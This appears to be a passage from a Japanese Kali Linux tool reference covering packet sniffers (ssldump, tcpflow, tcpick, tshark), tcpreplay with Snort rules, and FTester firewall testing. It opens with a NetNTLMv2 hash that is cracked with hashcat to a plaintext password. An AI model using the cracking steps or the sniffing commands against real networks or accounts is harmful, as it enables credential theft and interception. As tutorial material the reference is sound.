hello::PC-H4DSCFC:931bb014658bde50:5EFAE7A29FC3A169688C477B27E3158A:01010000000000000083A2202D32DB01F15D4E42BBAA0B1F0000000002000800540036004800490001001E00570049004E002D00540045004C0036005A004A004300430045004C00490004003400570049004E002D00540045004C0036005A004A004300430045004C0049002E0054003600480049002E004C004F00430041004C000300140054003600480049002E004C004F00430041004C000500140054003600480049002E004C004F00430041004C00070008000083A2202D32DB01060004000200000008003000300000000000000001000000002000000AD10B35729C9E358274F39C9FDBD207386FEA63052F816CDEF4605F0A89A2070A001000000000000000000000000000000000000900140063006900660073002F00680065006C006C006F000000000000000000
# ハッシュ値がHashcatのどのモードに該当するのかを調べる
root@kali:~# cat hash.txt | hashid -m
Analyzing 'hello::PC-H4DSCFC:465c5da9cbe544fd:5474F2A7A46BD2AE6E62D6BB8F1CBD8B:01010000000000000017F7A12732DB014A079D346C5B352B00000000020008003800380039004A0001001E00570049004E002D00420057003100480038004C003900300038004300550004003400570049004E002D00420057003100480038004C00390030003800430055002E003800380039004A002E004C004F00430041004C00030014003800380039004A002E004C004F00430041004C00050014003800380039004A002E004C004F00430041004C00070008000017F7A12732DB01060004000200000008003000300000000000000001000000002000000AD10B35729C9E358274F39C9FDBD207386FEA63052F816CDEF4605F0A89A2070A001000000000000000000000000000000000000900140063006900660073002F00680065006C006C006F000000000000000000'
[+] NetNTLMv2 [Hashcat Mode: 5600]
# Hashcatで解読
root@kali:~# hashcat -a 3 -m 5600 hash.txt ?l?l?l?l?l
hashcat (v6.2.6) starting
[...]
HELLO::PC-H4DSCFC:465c5da9cbe544fd:5474f2a7a46bd2ae6e62d6bb8f1cbd8b:0101000000000000001...:world
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: HELLO::PC-H4DSCFC:465c5da9cbe544fd:5474f2a7a46...000000
[...]
ssldump
SSLv3/TLSネットワークプロトコルアナライザです。 SSLv3/TLSトラフィックを識別すると、レコードをデコードし、標準出力にテキスト形式で表示します。
■ 使用方法
root@kali:~# man ssldump
SYNOPSIS
ssldump [ -aAdeFHjnNPqtTvxXyz ] [ -i interface ]
[ -k keyfile ] [ -l sslkeylogfile ] [ -p password ] [ -r dumpfile ] [ -w outputpcap ]
[ -S [crypto|d|ht|H|nroff] ] [ expression ]
OPTIONS
-a Print bare TCP ACKs (useful for observing Nagle behavior).
-A Print all record fields (by default ssldump chooses the most interesting fields).
-d Display the application data traffic. This usually means decrypting it, but when -d is used ssldump will also decode application
data traffic before the SSL session initiates. This allows you to see HTTPS CONNECT behavior as well as SMTP STARTTLS. As a side
effect, since ssldump can\'t tell whether plaintext is traffic before the initiation of an SSL connection or just a regular TCP
connection, this allows you to use ssldump to sniff any TCP connection. ssldump will automatically detect ASCII data and display
it directly to the screen. non-ASCII data is displayed as hex dumps. See also -X.
-e Print absolute timestamps instead of relative timestamps.
-F Specify the number of packets after which a connection pool cleaning is performed (in packets, default: 100).
-H Print the full SSL packet header.
-i interface
Use interface as the network interface on which to sniff SSL/TLS traffic.
-j Switch output format to JSON. Only stdout is affected by this toggle.
-k keyfile
Use keyfile as the location of the SSL keyfile (OpenSSL format) Previous versions of ssldump automatically looked in
./server.pem. Now you must specify your keyfile every time.
-l sslkeylogfile
Use sslkeylogfile as the location of the SSLKEYLOGFILE (https://developer.mozilla.org/en-
US/docs/Mozilla/Projects/NSS/Key_Log_Format).
-n Don\'t try to resolve host names from IP addresses.
-N Attempt to parse ASN.1 when it appears, such as in certificates and DNs.
-p password
Use password as the SSL keyfile password.
-P Don\'t put the interface into promiscuous mode.
-q Don\'t decode any record fields beyond a single summary line. (quiet mode).
-r file
Read data from file instead of from the network. The old -f option still works but is deprecated and will probably be removed
with the next version.
-S [ crypto | d | ht | H ]
Specify SSL flags to ssldump. These flags include:
crypto Print cryptographic information.
d Print fields as decoded.
ht Print the handshake type.
H Print handshake type and highlights.
-t Specify the TTL for inactive connections referenced in the connection pool (in seconds, default: 100).
-T Print the TCP headers.
-w outputpcap
Use outputpcap as the destination for decrypted packets.
-x Print each record in hex, as well as decoding it.
-X When the -d option is used, binary data is automatically printed in two columns with a hex dump on the left and the printable
characters on the right. -X suppresses the display of the printable characters, thus making it easier to cut and paste the hex
data into some other program.
-y Decorate the output for processing with nroff/troff. Not very useful for the average user.
-z Add timestamp in front of TCP packet description (-T)
■ 使用例
# HTTPSリクエストを送信
root@kali:~# curl -4 https://example.com
# トラフィックをリアルタイムで監視してSSLv3/TLSの情報を表示
root@kali:~# ssldump -i eth0 -j -n -ANH | jq
{
"connection_number": 1,
"record_count": 1,
"timestamp": "1731827455.7356",
"src_name": "192.168.11.3",
"src_ip": "192.168.11.3",
"src_port": 43646,
"dst_name": "93.184.215.14",
"dst_ip": "93.184.215.14",
"dst_port": 443,
"record_len": 395,
"record_ver": "3.1",
"msg_type": "Handshake",
"handshake_type": "ClientHello",
"ja3_str": "771,4866-4867-4865-4868-49196-52393-49325-49162-49195-49324-49161-49200-52392-49172-49199-49171-157-49309-53-156-49308-47-159-52394-49311-57-158-49310-51,51-5-0-13-28-10-11-16-22-65281-43-23,23-24-25-29-30-256-257-258-259-260,0",
"ja3_fp": "ee839d543571bd085fedc8f6602abdf6"
}
[...]
tcpflow
パケットキャプチャツールです。シーケンス番号を理解し、再送やアウトオブオーダー配信に関係なくデータストリームを正しく再構築し表示します。
■ 使用方法
root@kali:~# tcpflow --help
usage: tcpflow [-aBcCDhIpsvVZ] [-b max_bytes] [-d debug_level]
[-[eE] scanner] [-f max_fds] [-F[ctTXMkmg]] [-h|--help] [-i iface]
[-l files...] [-L semlock] [-m min_bytes] [-o outdir] [-r file] [-R file]
[-S name=value] [-T template] [-U|--relinquish-privileges user] [-v|--verbose]
[-w file] [-x scanner] [-X xmlfile] [-z|--chroot dir] [expression]
-a: do ALL post-processing.
-b max_bytes: max number of bytes per flow to save
-d debug_level: debug level; default is 1
-f: maximum number of file descriptors to use
-h: print this help message (-hh for more help)
-H: print detailed information about each scanner
-i: network interface on which to listen
-I: write for each flow another file *.findx to provide byte-indexed timestamps
-g: output each flow in alternating colors (note change!)
-l: treat non-flag arguments as input files rather than a pcap expression
-L semlock - specifies that writes are locked using a named semaphore
-p: don\'t use promiscuous mode
-q: quiet mode - do not print warnings
-r file : read packets from tcpdump pcap file (may be repeated)
-R file : read packets from tcpdump pcap file TO FINISH CONNECTIONS
-v : verbose operation equivalent to -d 10
-V : print version number and exit
-w file : write packets not processed to file
-o outdir : specify output directory (default '.')
-X filename : DFXML output to filename
-m bytes : specifies skip that starts a new stream (default 16777216).
-F{p} : filename prefix/suffix (-hh for options)
-T{t} : filename template (-hh for options; default %A.%a-%B.%b%V%v%C%c)
-Z do not decompress gzip-compressed HTTP transactions
-K: output|keep pcap flow structure.
Security:
-U user relinquish privleges and become user (if running as root)
-z dir chroot to dir (requires that -U be used).
Control of Scanners:
-E scanner - turn off all scanners except scanner
-S name=value Set a configuration parameter (-hh for info)
Console output options:
-B: binary output, even with -c or -C (normally -c or -C turn it off)
-c: console print only (don\'t create files)
-C: console print only, but without the display of source/dest header
-0: don\'t print newlines after packets when printing to console
-s: strip non-printable characters (change to '.')
-J: output json format.
-D: output in hex (useful to combine with -c or -C)
■ 使用例
# HTTPリクエストを送信
root@kali:~# curl http://example.com -4
# tcpflowでパケットをキャプチャ
root@kali:~# tcpflow -c -i eth0 -T'%T %N %A:%a > %B:%b'
# DNSクエリ(UDP)は連続したストリームとして構造化されていないため表示されない
2024-11-22T02:38:19Z 000 192.168.011.003:57610 > 093.184.215.014:00080: GET / HTTP/1.1
Host: example.com
User-Agent: curl/8.9.1
Accept: */*
2024-11-22T02:38:19Z 001 093.184.215.014:00080 > 192.168.011.003:57610: HTTP/1.1 200 OK
Age: 28449
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Nov 2024 02:38:20 GMT
Etag: "3147526947+ident"
Expires: Fri, 29 Nov 2024 02:38:20 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECAcc (sac/2579)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1256
<!doctype html>
[...]
# tcpdumpでパケットをキャプチャ
root@kali:~# tcpdump -A -n -i eth0
02:41:21.872347 IP 192.168.11.3.34219 > 192.168.11.1.53: 31532+ A? example.com. (29)
E..9d.@.@.(,......A....5.%..{,...........example.com.....
02:41:21.873757 IP 192.168.65.7.53 > 192.168.11.3.34219: 31532 1/0/0 A 93.184.215.14 (56)
E..TRe@.?.;o..A......5...@..{,...........example.com......example.com...........]...
02:41:21.874414 IP 192.168.11.3.54382 > 93.184.215.14.80: Flags [S], seq 2964243918, win 64240, options [mss 1460,sackOK,TS val 1596352808 ecr 0,nop,wscale 7], length 0
E..<..@.@..0....]....n.P.............
.........
_&i(........
02:41:22.002762 IP 93.184.215.14.80 > 192.168.11.3.54382: Flags [S.], seq 2795602936, ack 2964243919, win 29184, options [mss 1460,nop,nop,TS val 2851310283 ecr 1596352808,nop,wscale 7], length 0
E..<|p..?..p]........P.n..........r../.........
...._&i(....
02:41:22.002897 IP 192.168.11.3.54382 > 93.184.215.14.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 1596352936 ecr 2851310283], length 0
E..4..@.@..7....]....n.P...................
_&i.....
02:41:22.003071 IP 192.168.11.3.54382 > 93.184.215.14.80: Flags [P.], seq 1:75, ack 1, win 502, options [nop,nop,TS val 1596352936 ecr 2851310283], length 74: HTTP: GET / HTTP/1.1
E..~..@.@.......]....n.P.............L.....
_&i.....GET / HTTP/1.1
Host: example.com
User-Agent: curl/8.9.1
Accept: */*
[...]
tcpick
パケットキャプチャツールです。データストリームを再構築・並び替えて表示します。
■ 使用方法
root@kali:~# man tcpick
SYNOPSIS
tcpick [ -a ] [ -n ] [ -C ]
[ -e count ]
[ -i interface | -r file ]
[ -X timeout ]
[ -D ] [ -F1 | -F2 ]
[ -yH | -yP | -yR | -yU | -yx | -yX ]
[ -bH | -bP | -bR | -bU | -bx | -bX ]
[ -wH[ub] | -wP[ub] | -wR[ub] | -wU[ub] ]
[ -v [ verbosity ]] [ -S ] [ -h ]
[ --separator ]
[ -T | -Tf [ number ]]
[ -E | -Ef [ number ]]
[ -Pc | -Ps ]
[ "filter" ]
[ --help ] [ --version ]
BASE OPTIONS
-i --interface interface
listen on selected interface, (i.e. ppp0 or eth0). If option -i is omitted, tcpick is able to select the first open interface
(usually a ethernet card).
-r --readfile
reads raw packets from a file written with tcpdump -w instead of using a network device.
"filter"
This is the filter for the capturer engine. You can set it in the same way of setting the tcpdump(1) filter. Read tcpdump(1) man‐
page for other explanations.
-a Displays host names instead of ip addresses. Warning: for every new ip grabbed a dns query will be generated! Use it carefully on
high-traffic network devices!
-C --colors
Uses terminal colors: very nice! It should help you to read the output of tcpick
-D number --dirs number
Create directories to store sniffed sessions. When a directory contains number sessions, a new one will be created.
-e count
Exits when count packets have been sniffed
-E number
Exit when number sniffed connections are detected as "CLOSED"
-Ef number
Exit when the first number connections are detected as "CLOSED"
-F1 -F2 --filenaming 1|2
Choose the filenaming system.
-F1 : tcpick_clientip_serverip.side.dat
(side means clnt, serv or both)
-F2 : tcpick_connectionnumber_clientip_serverip.side.dat
-h Shows source and destination ip and port; shows tcp flags as letters.
--help Displays a short help summary
-p Don\'t put the network interface in promiscuous mode. Note that the interface might be in promiscuous mode for some other
reason.
-S Suppresses the "status of the connection" banner.
--separator
Add a separator for the payloads displayed.
-t Adds timestamp in hour:minutes:seconds:microseconds format
-td Like -t with date timestamp in day-month-year format
-T number
Track number connections. It could be very useful on a high-traffic network device. If number is not specified, it will be set
to 1.
-Tf number
Track only the first number connections; the following will be discarded. If number is not specified, it will be set to 1.
-v verbosity
Quite useless, yet. Set verbosity level. Actually there are not really many extra messages to display, this means it is enabled
by default (-v1). Set verbosity level to 0 to suppress extra messages (-v0) except error messages. Set verbosity level to 5 to
display debug messages (-v5). There are not other verbosity levels.
-X timeout
Connections are considered EXPIRED when there is no traffic for at least timeout seconds. Default is 600.
--version
Displays the tcpick version
DISPLAY THE DATA IN THE TCP PACKETS
These options are prefixed by -y and are useful to display in various ways the content of the packet sniffed (the data, called payload),
once it arrives at the listening interface. In that way the tcp duplicates will be not discarded and the packets will not be reordered,
but displayed "as is". If you want a fully acknowledged stream, see the -w and -b set of options.
-yH View data in hexadecimal-spaced mode (for the hexdump see -yx and -yX options.
-yP Shows data contained in the tcp packets. Non-printable characters are transformed in dots: ".". Newline character is preserved.
This is the best way, in my opinion to show data like HTTP requests, IRC communication, SMTP stuff and so on.
-yR Displays all kind of characters, printable and non printable. If something binary is transmitted, the effect will probably be
like watching with "cat" at a gzipped file.
-yx Shows all data after the header in hexadecimal dump of 16 bytes per line.
-yX Shows all data after the header in hexadecimal and ascii dump with 16 bytes per line.
-yU Shows all data after the header, but Unprintable characters are displayed as hexadecimal values between a "<" and a ">" symbol.
[...]
■ 使用例
# HTTPリクエストを送信
root@kali:~# curl http://example.com -4
# tcpickでパケットをキャプチャ
root@kali:~# tcpick -i eth0 -yP -h
# DNSクエリ(UDP)はパケットのデータのみ表示される
I............example.com.....
I............example.com......example.com..........]...
192.168.11.3:50238 S > 93.184.215.14:http (0)
1 SYN-SENT 192.168.11.3:50238 > 93.184.215.14:http
93.184.215.14:http AS > 192.168.11.3:50238 (0)
1 SYN-RECEIVED 192.168.11.3:50238 > 93.184.215.14:http
192.168.11.3:50238 A > 93.184.215.14:http (0)
1 ESTABLISHED 192.168.11.3:50238 > 93.184.215.14:http
192.168.11.3:50238 AP > 93.184.215.14:http (74)
GET / HTTP/1.1
Host: example.com
User-Agent: curl/8.9.1
Accept: */*
93.184.215.14:http A > 192.168.11.3:50238 (0)
93.184.215.14:http A > 192.168.11.3:50238 (1448)
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 283846
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Nov 2024 02:46:14 GMT
Etag: "3147526947"
Expires: Fri, 29 Nov 2024 02:46:14 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECAcc (lac/5586)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1256
<!doctype html>
[...]
# tcpdumpでパケットをキャプチャ
root@kali:~# tcpdump -A -n -i eth0
02:49:38.069221 IP 192.168.11.3.49553 > 192.168.11.1.53: 18864+ A? example.com. (29)
E..9.r@.@..}......A....5.%..I............example.com.....
02:49:38.075079 IP 192.168.65.7.53 > 192.168.11.3.49553: 18864 1/0/0 A 93.184.215.14 (56)
E..T..@.?. ...A......5...@..I............example.com......example.com........Z..]...
02:49:38.075568 IP 192.168.11.3.50376 > 93.184.215.14.80: Flags [S], seq 3296100245, win 64240, options [mss 1460,sackOK,TS val 1596849039 ecr 0,nop,wscale 7], length 0
E..<Oj@.@.
v....]......P.v...........
.........
_-..........
02:49:38.210142 IP 93.184.215.14.80 > 192.168.11.3.50376: Flags [S.], seq 1774560246, ack 3296100246, win 29184, options [mss 1460,nop,nop,TS val 2851806492 ecr 1596849039,nop,wscale 7], length 0
E..<g...?.3.]........P..i....v....r..].........
...._-......
02:49:38.210279 IP 192.168.11.3.50376 > 93.184.215.14.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 1596849174 ecr 2851806492], length 0
E..4Ok@.@.
}....]......P.v..i..............
_-......
02:49:38.210511 IP 192.168.11.3.50376 > 93.184.215.14.80: Flags [P.], seq 1:75, ack 1, win 502, options [nop,nop,TS val 1596849174 ecr 2851806492], length 74: HTTP: GET / HTTP/1.1
Tcpreplay
tcpdumpでトレースしたトラフィックを再生します。
■ 使用方法
root@kali:~# tcpreplay --help
Usage: tcpreplay [ -<flag> [<val>] | --<name>[{=| }<val>] ]... \
<pcap_file(s)> | <pcap_dir(s)>
-d, --dbug=num Enable debugging output
- it must be in the range:
0 to 5
-q, --quiet Quiet mode
-T, --timer=str Select packet timing mode: select, ioport, gtod, nano
--maxsleep=num Sleep for no more then X milliseconds between packets
-v, --verbose Print decoded packets via tcpdump to STDOUT
-A, --decode=str Arguments passed to tcpdump decoder
- requires the option 'verbose'
-K, --preload-pcap Preloads packets into RAM before sending
-c, --cachefile=str Split traffic via a tcpprep cache file
- requires the option 'intf2'
-- and prohibits the option 'dualfile'
-2, --dualfile Replay two files at a time from a network tap
- requires the option 'intf2'
-- and prohibits the option 'cachefile'
-i, --intf1=str Client to server/RX/primary traffic output interface
-I, --intf2=str Server to client/TX/secondary traffic output interface
-w, --write=str Pcap file to receive traffic outputs
- prohibits the option 'intf2'
- an alternate for 'intf1'
--include=str Send only selected packet numbers
- prohibits the option 'exclude'
--exclude=str Send all but selected packet numbers
- prohibits the option 'include'
--listnics List available network interfaces and exit
-l, --loop=num Loop through the capture file X times
- it must be in the range:
greater than or equal to 0
--loopdelay-ms=num Delay between loops in milliseconds
- requires the option 'loop'
-- and prohibits the option 'loopdelay-ns'
- it must be in the range:
greater than or equal to 0
--loopdelay-ns=num Delay between loops in nanoseconds
- requires the option 'loop'
-- and prohibits the option 'loopdelay-ms'
- it must be in the range:
greater than or equal to 0
--pktlen Override the snaplen and use the actual packet len
-L, --limit=num Limit the number of packets to send
- it must be in the range:
greater than or equal to 1
--duration=num Limit the number of seconds to send
- it must be in the range:
greater than or equal to 1
-x, --multiplier=str Modify replay speed to a given multiple
- prohibits these options:
pps
mbps
oneatatime
topspeed
-p, --pps=str Replay packets at a given packets/sec
- prohibits these options:
multiplier
mbps
oneatatime
topspeed
-M, --mbps=str Replay packets at a given Mbps
- prohibits these options:
multiplier
pps
oneatatime
topspeed
-t, --topspeed Replay packets as fast as possible
- prohibits these options:
mbps
multiplier
pps
oneatatime
-o, --oneatatime Replay one packet at a time for each user input
- prohibits these options:
mbps
pps
multiplier
topspeed
--pps-multi=num Number of packets to send for each time interval
- requires the option 'pps'
- it must be in the range:
greater than or equal to 1
--unique-ip Modify IP addresses each loop iteration to generate unique flows
- requires the option 'loop'
--unique-ip-loops=str Number of times to loop before assigning new unique ip
- requires the option 'unique-ip'
--no-flow-stats Suppress printing and tracking flow count, rates and expirations
--flow-expiry=num Number of inactive seconds before a flow is considered expired
- prohibits the option 'no-flow-stats'
- it must be in the range:
greater than or equal to 0
-P, --pid Print the PID of tcpreplay at startup
--stats=num Print statistics every X seconds, or every loop if '0'
- it must be in the range:
greater than or equal to 0
-W, --suppress-warnings suppress printing warning messages
-V, --version Print version information
-h, --less-help Display less usage information and exit
-H, --help display extended usage information and exit
-!, --more-help extended usage information passed thru pager
--save-opts[=arg] save the option state to a config file
--load-opts=str load options from a config file
- disabled as '--no-load-opts'
- may appear multiple times
■ 使用例
# Ingressのトラフィック(ポートスキャン)をファイルに保存
root@kali_1:~# tcpdump -i eth0 -w scan.pcap
root@kali_2:~# nmap -sX 192.168.11.3 -p 80
# Egressのトラフィック(SMTP)をファイルに保存
root@kali_1:~# tcpdump -i eth0 -w smtp.pcap
root@kali_1:~# swaks --to user@example.com --server 192.168.11.4
# Snortのルールを作成
root@kali_1:~# cat > my.rules << EOF
alert tcp any any -> any any (msg:"SCAN nmap XMAS"; flow:stateless; flags:UPF; classtype:attempted-recon; sid:1000001; rev:1;)
alert tcp any any -> any 25 (msg:"Suspicious Email Sending"; content:"RCPT TO"; classtype:policy-violation; sid:1000002; rev:1;)
EOF
# Snortでループバックインターフェースを監視
root@kali_1:~# snort -c /etc/snort/snort.lua -A alert_fast -R my.rules -k none -i lo
Loading /etc/snort/snort.lua:
Loading snort_defaults.lua:
[...]
Commencing packet processing
++ [0] lo
# ファイルに保存したトラフィックをループバックインターフェースで5回再生
root@kali_1:~# tcpreplay -i lo --loop 5 scan.pcap smtp.pcap
# ルールで検知したアラートが表示される
root@kali_1:~# snort -c /etc/snort/snort.lua -A alert_fast -R my.rules -k none -i lo
[...]
Commencing packet processing
11/23-07:56:16.019475 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46202 -> 192.168.11.3:80
11/23-07:56:16.054914 [**] [1:1000002:1] "Suspicious Email Sending" [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.11.3:53560 -> 192.168.11.4:25
11/23-07:56:16.198196 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46202 -> 192.168.11.3:80
11/23-07:56:16.233648 [**] [1:1000002:1] "Suspicious Email Sending" [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.11.3:53560 -> 192.168.11.4:25
11/23-07:56:16.376947 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46202 -> 192.168.11.3:80
11/23-07:56:16.412419 [**] [1:1000002:1] "Suspicious Email Sending" [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.11.3:53560 -> 192.168.11.4:25
TShark
WiresharkのCLI版パケットキャプチャツールです。
■ 使用方法
root@kali:~# tshark --help
Usage: tshark [options] ...
Capture interface:
-i <interface>, --interface <interface>
name or idx of interface (def: first non-loopback)
-f <capture filter> packet filter in libpcap filter syntax
-s <snaplen>, --snapshot-length <snaplen>
packet snapshot length (def: appropriate maximum)
-p, --no-promiscuous-mode
don\'t capture in promiscuous mode
-I, --monitor-mode capture in monitor mode, if available
-B <buffer size>, --buffer-size <buffer size>
size of kernel buffer (def: 2MB)
-y <link type>, --linktype <link type>
link layer type (def: first appropriate)
--time-stamp-type <type> timestamp method for interface
-D, --list-interfaces print list of interfaces and exit
-L, --list-data-link-types
print list of link-layer types of iface and exit
--list-time-stamp-types print list of timestamp types for iface and exit
--update-interval interval between updates with new packets (def: 100ms)
Capture stop conditions:
-c <packet count> stop after n packets (def: infinite)
-a <autostop cond.> ..., --autostop <autostop cond.> ...
duration:NUM - stop after NUM seconds
filesize:NUM - stop this file after NUM KB
files:NUM - stop after NUM files
packets:NUM - stop after NUM packets
Capture output:
-b <ringbuffer opt.> ..., --ring-buffer <ringbuffer opt.>
duration:NUM - switch to next file after NUM secs
filesize:NUM - switch to next file after NUM KB
files:NUM - ringbuffer: replace after NUM files
packets:NUM - switch to next file after NUM packets
interval:NUM - switch to next file when the time is
an exact multiple of NUM secs
printname:FILE - print filename to FILE when written
(can use 'stdout' or 'stderr')
Input file:
-r <infile>, --read-file <infile>
set the filename to read from (or '-' for stdin)
Processing:
-2 perform a two-pass analysis
-M <packet count> perform session auto reset
-R <read filter>, --read-filter <read filter>
packet Read filter in Wireshark display filter syntax
(requires -2)
-Y <display filter>, --display-filter <display filter>
packet displaY filter in Wireshark display filter
syntax
-n disable all name resolutions (def: "mNd" enabled, or
as set in preferences)
-N <name resolve flags> enable specific name resolution(s): "mtndsNvg"
-d <layer_type>==<selector>,<decode_as_protocol> ...
"Decode As", see the man page for details
Example: tcp.port==8888,http
-H <hosts file> read a list of entries from a hosts file, which will
then be written to a capture file. (Implies -W n)
--enable-protocol <proto_name>
enable dissection of proto_name
--disable-protocol <proto_name>
disable dissection of proto_name
--only-protocols <protocols>
Only enable dissection of these protocols, comma
separated. Disable everything else
--disable-all-protocols
Disable dissection of all protocols
--enable-heuristic <short_name>
enable dissection of heuristic protocol
--disable-heuristic <short_name>
disable dissection of heuristic protocol
Output:
-w <outfile|-> write packets to a pcapng-format file named "outfile"
(or '-' for stdout). If the output filename has the
.gz extension, it will be compressed to a gzip archive
--capture-comment <comment>
add a capture file comment, if supported
-C <config profile> start with specified configuration profile
--global-profile use the global profile instead of personal profile
-F <output file type> set the output file type; default is pcapng.
an empty "-F" option will list the file types
-V add output of packet tree (Packet Details)
-O <protocols> Only show packet details of these protocols, comma
separated
-P, --print print packet summary even when writing to a file
-S <separator> the line separator to print between packets
-x add output of hex and ASCII dump (Packet Bytes)
--hexdump <hexoption> add hexdump, set options for data source and ASCII dump
all dump all data sources (-x default)
frames dump only frame data source
ascii include ASCII dump text (-x default)
delimit delimit ASCII dump text with '|' characters
noascii exclude ASCII dump text
help display help for --hexdump and exit
-T pdml|ps|psml|json|jsonraw|ek|tabs|text|fields|?
format of text output (def: text)
-j <protocolfilter> protocols layers filter if -T ek|pdml|json selected
(e.g. "ip ip.flags text", filter does not expand child
nodes, unless child is specified also in the filter)
-J <protocolfilter> top level protocol filter if -T ek|pdml|json selected
(e.g. "http tcp", filter which expands all child nodes)
-e <field> field to print if -Tfields selected (e.g. tcp.port,
_ws.col.info)
this option can be repeated to print multiple fields
-E<fieldsoption>=<value> set options for output when -Tfields selected:
bom=y|n print a UTF-8 BOM
header=y|n switch headers on and off
separator=/t|/s|<char> select tab, space, printable character as separator
occurrence=f|l|a print first, last or all occurrences of each field
aggregator=,|/s|<char> select comma, space, printable character as
aggregator
quote=d|s|n select double, single, no quotes for values
-t (a|ad|adoy|d|dd|e|r|u|ud|udoy)[.[N]]|.[N]
output format of time stamps (def: r: rel. to first)
-u s|hms output format of seconds (def: s: seconds)
-l flush standard output after each packet
(implies --update-interval 0)
-q be more quiet on stdout (e.g. when using statistics)
-Q only log true errors to stderr (quieter than -q)
-g enable group read access on the output file(s)
-W n Save extra information in the file, if supported.
n = write network address resolution information
-X <key>:<value> eXtension options, see the man page for details
-U tap_name PDUs export mode, see the man page for details
-z <statistics> various statistics, see the man page for details
--export-objects <protocol>,<destdir>
save exported objects for a protocol to a directory
named "destdir"
--export-tls-session-keys <keyfile>
export TLS Session Keys to a file named "keyfile"
--color color output text similarly to the Wireshark GUI,
requires a terminal with 24-bit color support
Also supplies color attributes to pdml and psml formats
(Note that attributes are nonstandard)
--no-duplicate-keys If -T json is specified, merge duplicate keys in an object
into a single key with as value a json array containing all
values
--elastic-mapping-filter <protocols> If -G elastic-mapping is specified, put only the
specified protocols within the mapping file
--temp-dir <directory> write temporary files to this directory
(default: /tmp)
--compress <type> compress the output file using the type compression format
Diagnostic output:
--log-level <level> sets the active log level ("critical", "warning", etc.)
--log-fatal <level> sets level to abort the program ("critical" or "warning")
--log-domains <[!]list> comma-separated list of the active log domains
--log-fatal-domains <list>
list of domains that cause the program to abort
--log-debug <[!]list> list of domains with "debug" level
--log-noisy <[!]list> list of domains with "noisy" level
--log-file <path> file to output messages to (in addition to stderr)
Miscellaneous:
-h, --help display this help and exit
-v, --version display version info and exit
-o <name>:<value> ... override preference setting
-K <keytab> keytab file to use for kerberos decryption
-G [report] dump one of several available reports and exit
default report="fields"
use "-G help" for more help
■ 使用例
# 宛先が53番ポートのパケットのみをキャプチャする
root@kali:~# tshark -i eth0 -f "dst port 53"
Capturing on 'eth0'
1 0.000000000 192.168.11.3 → 8.8.8.8 DNS 71 Standard query 0x4a50 A example.com
# キャプチャしたパケットのダンプから宛先が53番ポートのパケットのみを表示する
root@kali:~# tshark -r test.pcap -Y udp.dstport==53
1 0.000000000 192.168.11.3 → 8.8.8.8 DNS 71 Standard query 0x95d6 A example.com
# リアルタイムにキャプチャしたパケットの中からHTTPリクエストのホスト、メソッド、ユーザーエージェントを表示する
root@kali:~# tshark -i eth0 -Y http.request -T fields -e http.host -e http.request.method -e http.user_agent
Capturing on 'eth0'
example.com GET curl/8.11.0
# キャプチャしたパケットのダンプから宛先ポートの件数を集計して表示する
root@kali:~# tshark -r test.pcap -T fields -e tcp.dstport | awk '$1 < 10000' | sort | uniq -c | sort -rn
2057 80
250 22
Network Filtering
FTester
ファイアウォールのフィルタリングポリシーのテストを行います。
■ 使用方法
root@kali:~# ftest --help
Usage: ftest [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]
Configuration options:
-f <conf_file>
-c <source_ip>:<source_port>:<dest_ip>:<dest_port>:<flags>:<protocol>:<tos>
-v <verbose>
Timing options:
-d <delay, 0.25 = 250 ms>
-s <sleep time, 1 = 1 s>
Evasion options:
-e <evasion method>
-t <ids_ttl>
Connection options:
-r <reset connection>
-F <end connection>
-g <IP fragments number, es. 4|IP fragments size, es. 16b>
-p <TCP segments number, es. 4|TCP segments size, es 6b>
-k <cksum value, es. 60000>
-m <marker>
root@kali:~# ftestd --help
Usage: ftestd [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]
Configuration options:
-i <interface>
-g <fragments reassembly>
-m <marker>
-v <verbose>
Connection options:
-c <ttl1:ttl2> (ttl1 setting currently works only on Linux systems)
-m <marker>
■ 使用例
# テストシナリオを作成
root@kali_1:~# cat > ftest.conf << EOF
192.168.11.3:12345:192.168.65.3:80:S:TCP:0
192.168.11.3:12345:192.168.65.3:443:S:TCP:0
192.168.11.3:12345:192.168.65.3:20-25:S:TCP:0
stop_signal=192.168.11.3:80:192.168.0.3:12345:AP:TCP
EOF
# ホスト1とホスト2の間にファイアウォールを設置しインバウンドは22番、80番、443番ポートのみ許可に設定
# ホスト2でスニファー(ftestd)を起動
root@kali_2:~# ftestd -i eth0 -v
# ホスト1からテストシナリオを指定してパケットジェネレーター(ftest)を実行
root@kali_1:~# ftest -f ftest.conf -v -d 0.01
1 - 192.168.11.3:12345 > 192.168.65.3:80 S TCP 0
2 - 192.168.11.3:12345 > 192.168.65.3:443 S TCP 0
3 - 192.168.11.3:12345 > 192.168.65.3:20 S TCP 0
4 - 192.168.11.3:12345 > 192.168.65.3:21 S TCP 0
5 - 192.168.11.3:12345 > 192.168.65.3:22 S TCP 0
6 - 192.168.11.3:12345 > 192.168.65.3:23 S TCP 0
7 - 192.168.11.3:12345 > 192.168.65.3:24 S TCP 0
8 - 192.168.11.3:12345 > 192.168.65.3:25 S TCP 0
Stop packet => 192.168.11.3:80 > 192.168.0.3:12345 AP TCP
# パケットジェネレーターとスニファーを比較してレポートを作成
